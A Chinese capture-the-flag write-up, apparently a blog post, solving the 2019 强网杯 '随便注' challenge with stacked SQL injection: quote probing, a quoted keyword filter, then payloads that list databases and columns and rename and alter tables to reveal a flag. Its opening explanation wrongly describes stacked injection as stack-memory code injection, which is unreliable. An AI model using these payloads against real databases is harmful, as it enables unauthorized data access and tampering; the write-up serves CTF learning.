堆叠注入([强网杯 2019]随便注1)

详解:

堆叠注入(Stack Injection)是一种计算机安全概念,涉及攻击者向程序的堆栈内存中插入恶意代码,以便在程序执行期间执行非预期的操作。

堆栈注入攻击通常利用程序在处理函数调用时使用的堆栈机制。当一个函数被调用时,程序将在堆栈中为其分配内存以保存局部变量和返回地址。攻击者可以找到并修改这些堆栈中的值,将恶意代码插入到程序的执行流程中。

堆叠注入攻击通常需要攻击者对目标程序的运行环境和代码结构有一定的了解。攻击者可能需要了解目标程序的输入格式、函数调用方式和内存管理机制等方面的知识。

堆叠注入攻击具有很高的危害性,因为攻击者可以在程序执行期间执行任意代码,包括窃取敏感数据、破坏系统安全和破坏应用程序的正常运行。为了防止堆叠注入攻击,可以采取以下措施:

  • 对输入数据进行验证和过滤,确保输入符合预期格式,并防止恶意代码注入。
  • 使用安全的编程技巧,例如避免使用不安全的函数和避免将数据直接传递给系统调用。
  • 实施安全防护措施,例如使用防火墙、入侵检测系统和安全扫描工具来检测和防御堆叠注入攻击。
  • 对代码进行安全审计和漏洞分析,发现潜在的安全漏洞并进行修复。

测试:

1.输入1测试一下

2.用1'测试

有报错,说明用'闭合的闭合方式 同时可以确定有可能使用的是报错注入

3.select查询是否有过滤

发现过滤关键字("/select|update|delete|drop|insert|where|\./i")而且不区分大小写,发现select被过滤,联合查询,布尔,时间盲注,报错注入都不能用,只能使用堆叠注入

4.尝试使用堆叠注入,查询数据库

复制代码
1'; show databases; #

5.查询表

复制代码
1'; show tables; #

5.存在两张表,分别查询

复制代码
1'; show columns from `words`; #
1'; show columns from `1919810931114514`; #

注意`这个符号是转义符,表明这里面的是数据库里面的内容

在`1919810931114514`表中发现flag字段。

找到flag字段之后,怎么也查询不到flag字段中的数据,select被过滤,后面是参考大佬的做法

让程序中已经存在的select语法帮我们进行查询,把words改名为其他,191这个表改名为words,然后再添加id字段,将flag字段改为data。

先将 words 改为别的名字 比如 words2 或者其他

然后将 1919810931114514 改为 words

把属性名flag改为id,然后用1' or 1=1;# 显示flag出来

在这之前当然要先把words表改名为其他。

直接构造payload

复制代码
1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100); #

6.表修改之后,再次查询表

修改成功

7.直接查询字段

相关推荐
LaughingZhu2 分钟前
Product Hunt 每日热榜 | 2026-07-17
前端·数据库·人工智能·经验分享·mysql·chatgpt·html
DFT计算杂谈5 分钟前
DeepSeek 集群服务器无root本地部署指南
数据库·人工智能·python·opencv·算法
潇凝子潇6 分钟前
UnsupportedOperationException
java·前端·数据库
七夜zippoe13 分钟前
DolphinDB实时聚合计算:多维度聚合
数据库·dolphindb
解局易否结局2 小时前
鸿蒙人脸检测与活体识别实战:基于 @ohos.visionKit 构建安全身份验证
安全·华为·harmonyos
踏月的造梦星球10 小时前
DMDPC 学习:架构、部署、运维与调优
运维·数据库·学习·架构
韩楚风10 小时前
【参天引擎】事务生命周期 / MVCC / Undo / ACID / 分布式事务 功能域整体解析
数据库·分布式·mysql·架构·cantian
renhongxia111 小时前
世界模型,是“空中楼阁”还是AGI的“最后一块拼图”?
运维·服务器·数据库·人工智能·算法·agi
程序员无隅11 小时前
Coding Agent 为什么压缩上下文后还能继续工作?上下文模块设计拆解
java·开发语言·数据库
愿做无知一猿11 小时前
Nacos连接MySQL异常?DataGrip竟成救星
数据库·mysql